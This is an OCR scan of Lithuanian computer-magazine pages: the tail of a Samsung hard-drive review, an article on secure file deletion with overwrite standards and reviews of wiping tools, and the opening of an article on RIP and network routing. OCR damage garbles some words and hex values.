džiausias „Samsung“ koziris itin ty 
lus kietųjų diskų darbas. Todėl SpinPoint 


Paskutinius potėpius  spalvingame 
HD300LD ir HM100JC paveiksle uždeda 
FDB konstrukciniai sprendimai. T133 seri- 
jos diskuose naudojami specialūs trečios 
kartos FDB (Fluid Dynamic Bearing) varik 
liai, kurie pagerina akustines savybes, su- 
mažina vibraciją ir yra ilgaamžiškesni. Di- 
dėjant kietųjų diskų talpai rutuliniai guoliai, 
naudojami varikliuose, pasiekė savo gali- 
mybių ribas. Esant didesniems plokštelių su- 
kimosi greičiams, dėl trinties rutuliniai guo- 
liai kaista ir gali pasiekti kritiškai pavojinga 
ribą. Tuo tikslu Samsung T133 serijos HDD 
naudoja revoliucinę FDB technologiją. Čia 
velenas su plokštelėmis prilaikomas dviejų 
skystinių atraminių bei poros skystinių ra- 
dialinių guolių. Guoliai išdėstyti tarp veleno 
ir atraminės plokštelės įvorės, pripildytos 
specialaus tepimo lubrikanto. Tepamosios 
medžiagos sluoksnio storis yra tik keleto 
mikronų. Kadangi FDB mechanizmas ne- 
turi kontakto „metalas- metalas“, tokie HDD 
gali veikti žymiai didesniais greičiais IŠ- 
vengiama didelės vibracijos ir perkaitimo. 
Reziumuojant įspūdžius po T133 serijos te- 
stavimo galime pasakyti tik tiek, kad tai op- 
timalus talpos ir tylaus bei kokybiško darbo 
santykis. 
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Testas | 
WinXP startavimas (MB/s) 


Programos krovimas (MB/s) 6,44 


Įprastas naudojimas (MB/s) 4,80 


Virusų skenavimas (MB/s) 


Duomenų įrašymas (MB/s) 


PCMark'05 HDD Test rezultatai 
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Shredders, Wipers, 


Cleaners ė Erasers 


SVEIKINU TAVE, MIELASIS MANO SKAITY- 
TOJAU! ŠIANDIEN AŠ TAU ATVERSIU AKIS 
IR PAPASAKOSIU APIE TOKIĄ MŪSŲ DAR- 
BE SVARBIĄ PROBLEMĄ, KAIP INFORMA- 
CIJOS SAUGOJIMAS IR APSAUGA, O KON- 
KREČIAU PAKALBĖSIU APIE VISIŠKĄ IR NE- 
GRĮŽTAMĄ JOS PAŠALINIMĄ IŠ DUOMENŲ 
SAUGOJIMO ĮRENGINIŲ. 


SOFTWARE 


IMPLANT 


Negrįžtamas informacijos pašalinimas 
[Introduction] Ko gero, pradėsiu išsklaidydamas vieną 
iš mitų, kuris kietai įsitvirtinęs miesčionių protuose;: „Jei 
gu žmogus kažką nutyli, vadinasi, Jis turi ką slėpti!“. Bū 
tent šiuo atžvilgiu dažnai klysta ir įvairių šalių teisėsau 
gos organai. Tačiau net jeigu tu ir neužsiiminėji juodais 
darbeliais, tikrai turi teisę šifruoti savo disko turinį ir 
reguliariai atlikinėti laisvų sektorių išvalymą. 


HACK 


SCENA 


[Technologies] Ką gi, pereisim prie reikalo. Pabandy 
siu tau pateikti ką nors labiau pritaikomo, nei teisės 
aktų straipsniai. Pakalbėsiu apie negrižtamo informaci 
jos pašalinimo iš magnetinių kaupiklių technologijas. 
Leisiu sau priminti, kad mano tikslas nėra aprašyti gali 
mus tavo veiksmus tuo atveju, jeigu tave aplankys links 
mieji vaikinai iš vidaus organų, 0 viso labo bandau pra 
plėsti tavo akiratį šioje srityje Ir apsaugoti tave nuo įvai 
rių smalsuolių, kurie nieko prieš pasikapstyti svetimoje 
asmeninėje informacijoje, taip pat ir toje, kuri saugo- 
ma tavo kompiuteryje. 

Tikiuosi, tu jau žinai, kad operacinės sistemos (nesvar 
bu, ar Windows, ar Linux) priemonėmis pašalintą infor 
maciją gali lengvai atstatyti atitinkama programine įranga 
apsiginklavęs gudresnis vartotojas, o ką jau kalbėti apie 
profesionalus, kurie apsikarstę įvairiausia specialia įran 
ga, kurią galima pamatyti tik filmuose apie šnipus :). 
Paprasčiausios informacijos atstatymo technologijos pa- 
gristos tuo, jog šalinant informaciją operacinės siste 
mos priemonėmis faktiškai pašalinami duomenys iš bylų 
išsidėstymo diske lentelės, 0 duomenų saugojimo sri- 
tyje esanti informacija lieka nepakitusi. Be to, pavyz- 
džiui, Windows Server 2003 sistemoje įdiegta vadina- 
moji „versijų sistema“, kuri leidžia vartotojui apsisaugo- 
ti nuo atsitiktinio bylos sunaikinimo. Pakeistos bylos sau- 
gojamos specialiai tam skirtoje paslėptoje disko srityje 
(shadow area), taigi, šiuos duomenis taip pat būtina 
pašalinti, kad neliktų duomenų atstatymo galimybės. 
Windows sistemoje taip pat yra laikinos bylų kopijos bei 
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pagefile byloje esantys duome- 
nys, ir viso to reikia nepamiršti, 
kad taip nepaliktum konfiden- 
cialios informacijos. 

Vis dėlto ištrintų bylų atstatymo 
procedūra atmetus pasleptas 
sritis susiveda | nuoseklią infor 
macijos paiešką visame kieta- 
jame diske, tačiau šis metodas 
negarantuoja pilno atstatymo ir 
jo panaudojimo sudėtingumas 


Norai Ghost B014 Gg proporcingas failų sistemos 
šioje apžvalgoje aplararių Ša 

programų negali šisiarais;— Tragmentacijos lygiui. Nevertė- 
kontroliniuose taškuose sau" tų galvoti, kad jeigu tu nė karto 


goma informacija, 0 butent ji 


nepaleidinėjai defragmentato- 
riaus, tai tave išgelbės nuo ta- 
vo duomenų išgavimo: jeigu tu bent šiek tiek vaikščiojai į univer 
sitete dėstomas fizikos paskaitas, tai turėtumei žinoti apie toki 
reiškinį, kaip histerezė. Histerezės esmė tame, kad magnetinės 
indukcijos pokyčiai atsilieka nuo magnetinio lauko H įtampos 
pokyčio. Paprastai tariant, histerezė sąlygota vidinės savaiminio 
persimagnetinimo sričių trinties. Būtent dėl šio atsilikimo mag- 
netinio kaupiklio takelio kraštų srityse įmanoma atstatyti net ir 
perrašytą informaciją. 

Pačiu paprasčiausiu atveju norint sunaikinti informacija pakan- 
ka su tekstiniu redaktoriumi atidaryti pageidaujamą bylą ir | ją 
prirašyti atsitiktinių nesąmonių. Šis būdas iš karto vienareikš- 
miškai atmeta daugybę ganėtinai žinomų įrankiu, tokiu, kaip 
Easy Recovery arba GetDataBack, priversdamas jas nervingai 
trypčioti nuošalyje. Vis dėlto jų nurašyti nederėtų, nes jos nebu- 
vo kuriamos tokioms sudėtingoms užduotims, todėl apie jas aš 
šiandien nešnekėsiu. Tačiau paskubėsiu tave nuliūdinti ir galų 
gale atskleisti siaubingą paslaptį: egzistuoja specialūs irankiai 
ir įrenginiai, kurie leidžia atstatyti informaciją net ir po tokių 
sudėtingų veiksmų su tekstiniu redaktoriumi. Be to, nevertėtų 
galvoti, kad šios priemonės yra tik specialiųjų tarnybų rankose: 
informacijos atstatymo priemones ir metodus naudoja daugelis 
firmų, kurios iš to gauna didelį pelną... Ak, tiesa, aš šiek tiek 
užsisvajojau ir atitrūkau. 


tavo Ir gali išduoti 


[Information Static Collection] Taigi pirmasis 
iš man žinomų metodų pagrįstas statiniu infor 
macijos sukaupimu po daugkartinio duomenų 
nuskaitymo iš disko sektorių, kurie buvo išvalyti. 
Šio metodo esmę galima paaiškinti taip. Kaip 
žinia, kietajame diske informacija saugoma dve- 
jetaine forma - vienetukų ir nuliukų sekų pavi- 
dalu, kurie iš tiesų yra skirtingais būdais įmag- 
netintos magnetinio kaupiklio sritys. Sąlyginai 
šnekant, į kietąjį diską įrašytą vienetuką kie- 
tojo disko valdiklis nuskaitys kaip 1, o įrašytas 
O bus nuskaitytas kaip O. Tačiau jeigu vietoje 
O bus įrašytas 1, tai, salyginai šnekant, rezul- 
tatas bus lygus 0,95, ir atvirkščiai, jeigu vieto 
je 1 bus įrašytas 1, tai rezultatas bus lygus 
1,05. Valdikliui šie menki skirtumai visiškai ne- 
w! esminiai. Vis dėlto panaudojant specialią apa- 
ratūrą galima lengvai nuskaityti, kokia 1 ir O 
seka buvo įrašyta konkrečioje srityje. 


Geras žmogus 
Peter Gutman 
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[MFM] Antrasis metodas buvo sukurtas ne taip senai ir yra 
dar galingesnė atstatymo priemonė. Jis pagrįstas magneti- 
nės jėgos mikroskopijos (MFM) ir skenuojančios zondinės 
mikroskopijos principu. Šio metodo skiriamoji geba yra pa- 
kankama, kad būtų galima nuskaityti ir išskirti keletą nuo- 
seklių informacijos įrašų, o tai reiškia (o, siaube!!!), kad 
tavęs neišgelbės net dvigubas arba trigubas duomenų per- 
rašymas! 


[Top Security] Vis dėlto ir čia buvo rasta išeitis iš tokios sudė- 
tingos padėties. Garantuoto informacijos pašalinimo metodai 
yra! Taigi tau nebereikės daužyti savo kietojo disko su kūju, kep- 
ti jo mikrobangėje, sprogdinti, mesti iš balkono, kankinti rūgšti- 
mi, siųsti į branduolinį reaktorių arba paveikti HDD su ultragar- 
su: sutik, jog visa tai yra pakankamai siaubingas vaizdelis, nors 
tai ir veikia magnetinį paviršių, kartais net labai kenksmingai. 
Visiško fizinio informacijos pašalinimo užduotis pilnai reali- 
zuojama programiniais metodais, kurie pagrįsti tuo, jog reikia 
kuo daugiau perrašyti tą takelį, kuriame saugomi slapti duo- 
menys. Kiekvienas takelis turi būti pilnai permagnetintas, kad 
būtų išvengta histerezės (likutinio magnetizmo) poveikio. O ši 
užduotis savo ruožtu susiveda į saugią ištrynimo iteracijų kie- 
kio minimizaciją. Vis dėlto kaip ir sprendžiant bet kurią kitą 
užduotį, minimizacija labai dažnai ribojasi su saugumu, todėl 
norint gauti geriausią rezultatą reikia panaudoti į kiekvieną kie- 
tojo disko modelį aiškiai orientuotus algoritmus, kas, sutik, 
yra pakankamai sudėtinga... Vis dėlto, protingi žmonės jau 
senai viską sugalvojo už tave ir mane, ką padarė taip gerai, 
kad visi algoritmai susiėjo į nacionalinius standartus, kuriais 
naudojamasi ir šiandien. Daugelis šių algoritmų numato apie 
keturis perrašymus. Atrodo, jog vokiečiai ir čia laimėjo dėl sa- 
vo skrupulingumo, o mūsų didžiajai kaimynei iš rytų turėtų būti 
gėda, tiksliau šnekant, gėda turėtų būti tiems „specialistams“, 
kurie ten priima tokius silpnus informacijos naikinimo algorit- 
mus. Visu tuo įsitikinti ir suprasti, kame esmė, tu gali peržiū- 
rėjęs iškarpoje pateikiamą lentelę. 

Įdomi detalė: informacijos apsaugos vadovybė NISPOM drau- 
džia duomenų su grifu VISIŠKAI SLAPTAI naikinimui naudoti al- 
goritmą DoD 5220.22-M. 


+ Acrorės DriveCieaiser 


Data Selection 


You can choose partinės, nadiLated space ar) whole drives. To select data pince the mouse panter on 2 then Ch 
Vie leėt musa bedos, Piease, select data to be wipod In the pacturo bedow, 


Išvalomos particijos pasirnnkimas su Acronis 


Jį atitinkantys alternatyvūs metodai yra šie: 
1. Išmagnetinimas pagal P-5239-26 NAVSO standartą. 
2. Fizinis sunaikinimas. 


Iš visų išvardintų ypatingą dėmesį vertėtų skirti dviems, kuriuos 
aš laikau patikimiausiais. Tai Briuso Šnaierio algoritmas, kurį jis 
pasiūlė savo knygoje „Taikomoji kriptografija“ ir Piterio Gutma- 
no, „amžino aspiranto“ kompiuterių mokslų katedroje Ouklen- 
do universitete, algoritmas. Pastarasis mokslininkas sukūrė nuo- 
savą informacijos naikinimo sistemą ir saugumo įrankių rinkinį 
Cryptlib. Būtent šie algoritmai kelia pasitikėjimą ir yra labiausiai 
paplitę. Vieną žymiausių jo darbų tu gali perskaityti štai čia: 
www.cs.auckland.ac.nz/967Epgut001/pubs/secure del.html. 
Toliau, aptardami prieinamas programines priemones, mes ypa- 
tingą dėmesį skirsime šių algoritmų buvimui. 


[Kas gi tas MFM?] MFM metodas yra aprašytas EPOS svetai- 
nėje http://epos.kiev.ua/pubs/. EPOS yra viena žymiausių kom- 
panijų, užsiimančių informacijos atstatymu: 

„Magnetinis zondo antgalis juda virš disko plokštės paviršiaus 
maždaug 10-100 Angstremų atstumu. Priklausomai nuo mag- 
netinės sąveikos tarp kietojo disko magnetinės plokštės ir skai- 
tančios galvutės, jėgos atstumas tarp jų keičiasi. Šie atstumo 
svyravimai aptinkami su optiniu interferometru. Gautas vaizdas 
pateikia imagnetinimo pasiskirstymo vaizdą. 

Remiantis šiais metodais galima išmatuoti magnetinį disko pa- 
viršiaus reljefą ir atitinkamai atstatyti informaciją. Dėl labai di- 
delio įrašymo tankio mechaninė magnetinės galvutės įrenginio 
sistema nesugeba tiksliai sekti reikiamos trajektorijos, iš ko iš- 
plaukia, jog įrašinėjant naujus duomenis vietoje konfidencialios 
informacijos, naujieji duomenys visada bus įrašyti su tam tikrų 
poslinkiu anksčiau įrašytų duomenų atžvilgiu. 

Kiekvienas magnetinio disko takelis saugoja kiekvieno įrašo, kuris 
buvo kada nors jame padarytas, atvaizdą, tačiau kiekvieno to- 
kio įrašo (magnetinio sluoksnio) įnašo dydis priklauso nuo to 
įrašo padarymo laiko, t.y. magnetizmas ilgainiui mažėja.“ 


[Pagrindinių algoritmų lentelė] 

Informacijos apsaugos vadovas 

JAV Gynybos ministerija (NISPOM) 000 5220.22 M, 1995 m. 
Iteracijų kiekis: 4 


1-oji iteracija — laisvai pasirinkto kodo įrašymas. 
2-oji iteracija - invertuoto kodo įrašymas. 

3-oji iteracija — atsitiktiniu kodų įrašymas. 
4-oji — įrašų patikrinimas. 


Amerikiečių NAVSO P. 5239 26 (RL) 
Iteracijų kiekis: 4 


1-oji iteracija — Ox01 į visus sektorius. 
2-oji iteracija — 0x27FFFFFF, 

3-oji ileracija atsitiktinės simbolių sekos. 
4-oji iteracijo — patikrinimas. 


Amerikiečių NAVSO P--5239-26 (MFM) 
Ieraciju kiekis: 4 


1-oji iteracija — Ox01 į visus sektorius. 
2-oji iteracija — Ox7FFFFFF. 
3-oji iteracija — atsitiktinės simboliu sekos. 


4 oji iteracija — patikrinimas. 


+ Acronis Drivelleanser 


Method selertion 


You can choose the appropriate method froti the kst of methods. Find the desenption cf the chosen method baika. Iš 
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Bruko Sheer 


onis metodų Įvairovė 


VISR standartas (Vokietija) 

Iteracijų kiekis: 7 

T-oji ir 6-oji iteracija besikeičiančiu Ox00 ir OxFF tipo seku įrašymas. 
T-oji  OXAA, lai yra Ox00, OxFF, 0x00, OxFF, 0x00, OxFF, OxAA. 


60ST P50739--95m. (Rusija) 

lteraciju kiekis: 1 

Nuo 6--to iki 410 apsaugos klasės sistemoms 
kiekviena kiekvieno sektoriaus baitą. 

Nuo 3-i0 iki 1-0 apsaugos klasės sistemoms 
įrašymas į kiekvieną kiekvieno sektoriaus baitų. 


nulių (0x00 pavidalo skaičių) įrašymas į 


atsitiktinai parinktų simbolių (skaičių) 


8.Šnaierio (Bruce Schneier) algoritmas 
Iteracijų kiekis: 7 

|-oji iteracija — loginių vienetų (OxFFh) įrašymas. 
2-oji — loginių vienetų (0x00) įrašymas. 
3-7 — atsitiktinai pasirinkti skaičiai. 
Piterio Gutmano (Pater Gutman) algoritmas. 
Iteracijų kiekis: 35 


1-4 ciklai — laisvai pasirinkto kodo įrašymas. 

5-6 ciklai -— kodu 0x55, OxAA įrašymas. 

7-9 ciklai kodu 0x92, 0x49, 0x24 įrašymas. 

10-25 ciklai — nuoseklus kodu nuo 0x00, 0x11, 0x22 ir 1.t. iki OxFF įrašymas. 
26-28 dklai — analogiškai 7..9 ciklams. 

29 31 ciklai — kodų 0x6D, OxB6 įrašymas. 

32-35 aklai — analogiškai 1.4 ciklams. 

Greitas, 


lteracijų kiekis: 1 
loginių nulių įrašymas (0x00 pavidalo skaičiu) į visus išvalomus sektorius 


[Bandomieji] Ka gi, ko gero, dabar pradėsime tų pačių progra- 
minių priemonių aptarimą, kurias minėjau pradžioje. Dėl tam 
tikrų niuansų aš neaptarinėsiu unix tipo sistemoms skirtų įran- 
kių. Bet aš manau, jog tu ir pats ne mažas, todėl žinai, kur 
ieškoti tavo konkrečiai sistemai skirtų programų. Jeigu ne visai 
gaunasi — rašyk. 


+ Commit Pending Operations i 


Operaban lai 1 

Wiping unallocated space 
Begiri sector 
Methos Bruce Sheer 
Totai ps4465 
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Comgsta wth cenfydosca 


ww“ acronis com 


[Acronis Drive Cleanser] Pirmoji mano apžvalgoje bus gerai 
žinoma kontora „Acronis“ su savo įrankiu Acronis Drive Clean- 
ser. Paprastai ši programa įeina į stambesnį tavo saugumo uUž- 
tikrinimo paketą Acronis Privacy Expert Suit. Sios firmos gami- 
nama programinė įranga pakankamai gera, tai pasakytina ir apie 
Drive Cleanser. Vis dėlto ji nėra be trūkumų, tačiau apie juos 
pakalbėsiu šiek tiek vėliau. Iš pradžių sausi faktai apie šios 
sistemos privalumus: 

„ Didelis algoritmų pasirinkimas (praktiškai visi pateikti lentelėje). 
2. Galimybė sudaryti nuosavus duomenų šalinimo algoritmus. 
3. Algoritmų sudarymas pagal šabloną. 
4 
5 


p 


„ Gana maloni sąsaja. 

„ Išsami dokumentacija. 
6. Patogus praplėstas kontekstinis grafinės aplinkos meniu. 
Asmeniškai man iš karto į galvą šovė mintis sudaryti amerikietiškų 
standartų NISPOM ir NAVSO hibridus, kadangi būtent jų kombinaci- 
jos naudojamos „Top Secret“ dokumentams šalinti (kaip buvo pami- 
nėta anksčiau, NISPOM pats savaime tam reikalui nėra naudoja- 
mas). Tai man pavyko tiesiog puikiai. Be to, pasiūlyčiau tau pamiršti 
tokią klavišų kombinaciją, kaip shift+de! — juos su kaupu pakeis 
paprasčiausia šiukšliadėžė ir trynimas su Acronis valytuvu. 


L? BCWipe Task Manager L 


Tasks Help 
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laitną 22 06 


At 22 21 00 an 22 06 2005. startmo 22 06 2005 
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BCWipe užduočių valdymo irankis 


15| 


ĮHAKERIS 401 [32] 06 


16) 


ĮHAKERIS +01 [32] 06 


O dabar apie prieš tai pažadėtus trūkumus. Keletą kartų testi- 
nių iteracijų metu dirbant su viena iš mano disko particijų buvo 
pateikiamas perspėjimas apie negalėjimą rašyti į sektorių. Tai 
mane labai nustebino, nes mano praktiškai naujame kietaja- 
me diske bad-sector'ių nebuvo. Aš nuodugniai patikrinau tiek 
diską, tiek jo paviršių, tačiau nieko įtartino neradau, todėl ga- 
liausiai klaidos buvo nurašytos į Acronis Drive Cleanser sąskai- 
tą. Antro panašaus trūkumo esmė tame, jog ši programa ir vėl 
dėl man nelabai suprantamų priežasčių negali pašalinti kai ku- 
rių šiukšliadėžėje esančių bylų. Visa tai įvertinus, nuosprendis 
toks: panaudoti koviniais tikslais įmanoma, tik atsargiai. 


[080 Software SafeErase|] Numeris antras „0840 Softwa- 
re“ sukurta programa, kuri vadinasi SafeErase. Ko gero, ji nie- 
kuo nenusileidžia Acronis paketui, o kai Kuo net ji lenkia. Kaip ir 
Acronis produktas, SafeErase prideda savo praplėtimą prie kon- 
tekstinio meniu. Antrasis ir patikimesnis pėdsakų nuslėpimo 
būdas — tai pilnas visos sistemos išvalymas. Aš nesiryžau iš- 
bandyti jo namuose ir testavimą atlikau su viena iš universiteto 
mašinų, kurioje buvo 20 Gb HDD, 128 Mb RAM ir Celeron 600 
procesorius. Visas šalinimo procesas truko tris valandas, iš ku- 
rių dvi su puse ruošėmės mes patys su mano padėjėju, pildami 
į save patį hakeriškiausią gėrimą. Finale Runtime Software 
DiskExplorer parodė, jog HDD visas užpildytas nuliais. Vis dėlto 
man tas pusvalandis truko amžinybę: per tą laiką galėjo išlaužti 
mano duris, atjungti elektros tiekimą, sulaužyti man rankas ir 
išvežti ten, kur gyvena žmonės juodais drabužiais... Graudu, bet 
faktas vis tiek lieka akivaizdus: naudoti galima ir reikia. Viena- 
reikšmiškai. 


[Jetico BCWipe] Trečiasis numeris. Jetico BCWipe. Štai čia 
kažkas iš tiesų ypatingo: panašu į tai, kad gamintojai čia 
įvertino viską: ir paslėptas Windows kopijas, ir pusiau užim- 
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Eraser trynimo algoritmai 


tuose klasteriuose saugomus duomenis, ir laikinas bylas, ir 
RAM duomenis, ir pagefile byloje saugomą informaciją, ir 
grafiką, ir pilną visos informacijos pašalinimą. Tegu atlei- 
džia man gamintojai, jeigu aš ko nors nepaminėjau. Vienin- 
telis šios sistemos trūkumas tame, jog ja naudotis ne taip 
jau paprasta: ji susideda iš keleto vykdomų bylų, kurių kiek- 
viena atsako už savo sistemos galimybių jurisdikciją, todėl 
man po viso Acronis ir 040 grožio pasirodė, jog ši sistema 
iš pradžių buvo kuriama Linux terpėje. Toks galingas įrankis 
tokiu išbarstytu pavidalu tiesiog negali būti parašytas Win- 
dows sistemai... 


[„Eraser“, tiesiog „Eraser“| Pabaigai vertėtų paminėti pas- 
kutinį įrankį, kuris nuo likusių skiriasi savo platinimo stiliumi — 
jis yra visiškai nemokamas ir platinamas su išeities tekstais 
pagal GPL licenciją. Kaip ir BCWipe, čia yra galimybė šalinti 
bylas, išvalyti pagefile bei pagal grafiką valyti laisvą disko erdvę. 
Čia taip pat nėra nei vokiškojo standarto, nei Šnaierio algorit- 
mo, ir vėlgi, kaip ir BCWipe atveju, čia turės ką veikti komandi- 
nės eilutės Mėgėjai. 


[Pabaiga] Tuo aš ir baigsiu savo pamokomąjį pasakojimą. Lai- 
kydamasis tradicijų aš nepateiksiu jokio konkretaus nuosp- 
rendžio ir balais nevertinsiu testuotos programinės įrangos — 
pas mus demokratija, todėl tu pats sugebėsi pasirinkti tai, 
kuo naudosies, 0 ir šiaip, susirasti čia nepaminėtų programų 
nėra sunku, jeigu tik manai, kad saugumas -— aktualus daly- 
kas. Jeigu tu turi minčių, kuriomis norėtumei pasidalinti 
sveikas atvykęs į Www.ru24-team.net. Na, 0 aš grįžtu | savo 
elektronų ir maršrutizatorių bei duomenų grožio pasaulį, iš ku- 
rio atėjau. 
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Maršrutiniai nukrypimai 
ĮSIVAIZDUOK, KAD TAU REIKIA FTP PROTO- 
KOLU SUSIJUNGTI SU KALIFORNIJOS SER- 
VERIU. TU ĮSAKAI KLIENTUI TAI PADARYTI, 
TAČIAU NĖ NESUSIMĄSTAI, KOKIAIS KELIAIS 
EINA TAVO PAKETAI. 6) DERĖTŲ PASTEBĖTI, 
KAD JŲ MARSRUTAI PASLAPTINGI IR SU- 
DĖTINGI. VIS DĖLTO NEPAISANT REIKIAMŲ 
MARŠRUTŲ PAIEŠKOS SUDĖT INGUMO, PA- 
KETAS VISADA NUKELIAUS GREIČIAUSIU IR 
KOKYBIŠKIAUSIU KANALU. ŠĮ KELIO PARIN- 
KIMĄ ATLIKS MARŠRUTIZAVIMO PROTOKO- 
k APIE KURUOS MES DABAR IR PAŠNE- 
SIM. 


Maršrutizacija globaliuose tinkluose 
[Protinga metodų klasifikacija] Prieš pradėdami gilin- 
tis į mMaršrutizavimo globaliuose tinkluose (o būtent per 
tokius tinklus paketas keliaus iš Europos į JAV) teoriją, 
aptarsime maršrutizavimo metodų klasifikaciją. Paketų 
pristatymo teisinga kryptimi metodus priimta dalinti į 
tris dideles klases. 

1. Paprastas maršrutizavimas 

2. Fiksuotas maršrutizavimas 

3. Adaptyvinis maršrutizavimas 

Dabar apie kiekvieną šią klasę pakalbėsime šiek tiek 
išsamiau. Paprastas maršrutizavimas veikia kanalinio 
lygio įrenginių principu (kartotuvai, komutatoriai, tiltai) 
ir mūsų laikais naudojamas labai retai. Nepaisant to, 
apie jį reikia žinoti. Yra trys paprasto maršrutizavimo 
tipai. Pirmasis buvo pavadintas „atsitiktiniu maršrutiza- 
vimu“. Tokiu atveju kiekvienas paketą gavęs maršrutiza- 
torius jį išsiunčia į atsitiktinę sąsają (galbūt jis ir nuke- 
liaus ten, kur reikia :)). Pats supranti, jog toks požiūris 
negarantuoja greito ir kokybiško paketo pristatymo ga- 
vėjui. O daugeliu atvejų paketas iš viso bus sunaikintas 
dėl viršyto TTL. Antrasis tipas vadinamas „lavininiu marš- 
rutizavimu“. Tokiu atveju maršrutizatorius paketą siun- 
čia į visas aktyvias sąsajas. Šio tipo trūkumas — tinklas 
užteršiamas pertekline tarnybine informacija. Ir galiau- 
siai trečias tipas, vadinamas „maršrutizacija pagal pa- 
tirį“. Naudojant šį tipą, šliuzas iš pradžių sukaupia ži- 
nias apie maršrutus, prieš tai duomenis persiųsdamas 
dažniausiai lavininiu būdu. Po to, sudarinėdamas tam 
tikrą lentelę, jis mokosi nukreipti paketus ten, kur rei- 
kia. Tai labai primena tilto (bridge) veikimą, kuriame 
veikia mokymosi ir darbo režimai. 


Kaip jau minėjau, paprastas marš- 


rutizavimas dideliuose tinkluose 

tiesiog nepriimtinas, ypač jeigu “ P oiaisdinoiai 
mazgai susieti rezervinėmis ryšio II- No troninėje tibotekoje 
nijomis. Antrasis maršrutizavimo ti- e EBLIŲ 
pas, kuris buvo pavadintas „fiksuo- L 

tu“, siūlo taip vadinamą maršrutizavimo lentelę, kuri yra bet 
kurioje šiuolaikinėje operacinėje sistemoje. Kiekviena lentelė 
turi turėti mažiausiai penkis stulpelius. Štai jie: 

1. Tinklo adresas — tinklas arba atskiras IP adresas, į kurį turi 
būti pristatytas paketas. 

2. Potinklio kaukė — norint vienareikšmiškai identifikuoti potin- 
klį, reikia pasinaudoti potinklio kauke. 

3. Sliuzas — į šį adresą bus perduotas paketas tuo atveju, 
jeigu sutaps paskirties ir tinklo adresai. 

4. Sąsaja (arba fizinės jungties numeris) — inicializuoja sąsają, 
per kurią eis paketas. 

5. Metrika — tam tikras skaičius, kuris charakterizuoja ryšio 
kanalą. 


Fiksuoto maršrutizavimo esmė tame, kad visas kelių aprašy 
mo darbas gula ant tinklo administratoriaus pečių. Žinoma, 
paprasto lokalaus tinklo atveju aprašyti visus maršrutus gali- 
ma per penkias minutes. Tačiau kai kalbama apie globalų tin- 
klą su skirtingais kanalais, reikėtų labai smarkiai pagalvoti. 
Pavyzdžiui, jeigu tinkle yra rezervinės ryšio linijos, tai pagrindi- 
nio ryšio kanalo avarijos atveju į jas persijungti labai sudėtin- 
ga. Beje, šis metodas prigijo nedideliuose lokaliuose tinkluo- 
se ir magistralinėse linijose. 

Dar viena maža fiksuoto maršrutizavimo ypatybė: tuo atveju, 
kai viską arba daugelį paketų reikia pristatyti į vieną mazgą, 
naudojama „šliuzo pagal nutylėjimą“ (default gateway) sąvoka. 
Tada tinklo adresas ir kaukė bus 0.0.0.0. Kai paskirties adre- 
sas nesutampa su tinklo adresu, duomenys iškeliauja | šliuzą 
pagal nutylėjimą. 

Trečioji maršrutizavimo klasė, Kuri buvo pavadinta „adaptyvi- 
ne“, yra pati įdomiausia. Ji naudojama dideliuose tinkluose 
su skirtingais kanalais ir perteklinėmis ryšio linijomis. Adap- 
tacijos prasmė — greitai pakeisti maršrutą atskiros linijos 
išėjimo iš rikiuotės arba naujo šliuzo pridėjimo atveju. Šiuo 
metu naudojami du maršrutizavimo protokolai: RIP ir OSPF. 
Mes būtinai pakalbėsime apie kiekvieno jų veikimą, tačiau iš 
pradžių aptarsime bendrą duomenų perdavimo globaliuose 
tinkluose principą. 


[Globalių tinklų veikimo principas] Kaip tu jau žinai, egzis- 
tuoja taip vadinami „ryšio operatoriai“, kurie turi nuosavus 
kanalus ir nuomoja tiekėjams priėjimą prie jų. Kiekvieno ope- 
ratoriaus nuosavybę, įskaitant visus prie jo prisijungusių tie- 
kėjų lokalius tinklus, priimta vadinti „autonomine sistema“. 
Autonominė sistema — tai grupė tarpusavyje susijusių maši- 
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Tipiškos Windows ir Cisco maršrutizavimo lenteles 


nų su vieninga vidine maršrutizavimo politika (IGP — Internal 
Gateway Protocol). Pačios autonominės sistemos tarpusavy- 
16 sujungiamos galingais kanalais, tuo pačiu taip suformuo- 
jamas vieningas interneto tinklas. Tačiau tu tikriausiai su- 
pranti, kad neįmanoma kiekvienam maršrutizatoriui perduoti 
duomenų apie visus likusius maršrutizatorius. Būtent todėl 
priimta išskirti vadinamuosius autonominės sistemos „pa- 
sienio šliuzus“. Visi šliuzai sujungiami į vieną magistralę ir 
keičiasi duomenimis per išorinius maršrutizavimo protokolus 
(EGP — External Gateway Protocol). 


Kaip jau minėjau, vidiniams protokolams priskiriami RIP ir OSPF. 
Yra ir kitų retų metodų, tačiau standartizuoti ir populiarūs yra 
būtent šie du. RIP (Routing Information Protocol) protokolas yra 
labai paprastas ir universalus, todėl jį palaiko visos operacinės 
sistemos ir aparatūriniai maršrutizatoriai. Jis priskiriamas dis- 
tance-vector protokolų klasei. Dabar aš šiek tiek išsamiau pa- 
pasakosiu apie RIP veikimą. 


[Rest In Peace] RIP idėja labai paprasta. Kiekvienas marš- 
rutizatorius kas tam tikrą nustatytą laiko tarpą siunčia infor- 
maciją apie ryšius su savo kaimynais. Kaimynas juos susieja 
su savo duomenų baze ir prideda duomenis, jeigu jie yra 
aktualūs. Taip visi maršrutizatoriai turi žinoti apie visus savo 
tinklus. RIP metrika sutampa su žingsnių (praeinamų marš- 
rutizatorių) skaičiumi iki reikiamo tinklo. Tuo atveju, jeigu met- 
rika lygi 16, tinklas laikomas neprieinamu. Iš to išplaukia, 
jog protokolas gali dirbti tokiame tinkle, kuriame maksima- 
lus mazgų skaičius tarp dviejų bet kurių tinklų yra mažiau nei 
16. Pabandykime aptarti pavyzdį, kuris padės išsiaiškinti RIP 
protokolo darbo principą. Tarkim, mes turime tinklą iš ketu- 
rių maršrutizatorių A, B, C ir D (žr. nuotrauką). Vos tik mes 
aktyvavome protokolą arba pradėjome tiekti maršrutizatoriams 
elektros energiją, jie pradėjo aktyviai papildyti savo bazes. 
Pavyzdžiui, maršrutizatorius A, kuris sujungtas su šliuzais B, 
C bei galutiniu tinklu 1, po įjungimo išsiuntinės tokią infor- 
maciją: 


1->1 
- maršrutizatoriui ( 


(-> 1 — maršiutizatoriu B. 

Tarkim, jeigu šiuos duomenis gauna maršrutizatorius C, jis 
tuojau pat pradeda jų apdorojimą. Visų pirma jis patikrina, 
kad metrika neviršytų 16, o po to savo maršrutizavimo lente- 
lėje ieško paskirties tinklo. Jų nesuradęs jis įtrauks visą in- 
formaciją, tačiau prieš tai visas metrikas padidins vienetu. 
Po to maršrutizatorius C savo kaimynui D perduos tokius duo- 
menis: 


t 


| | —- i i 


(t -— B | + 


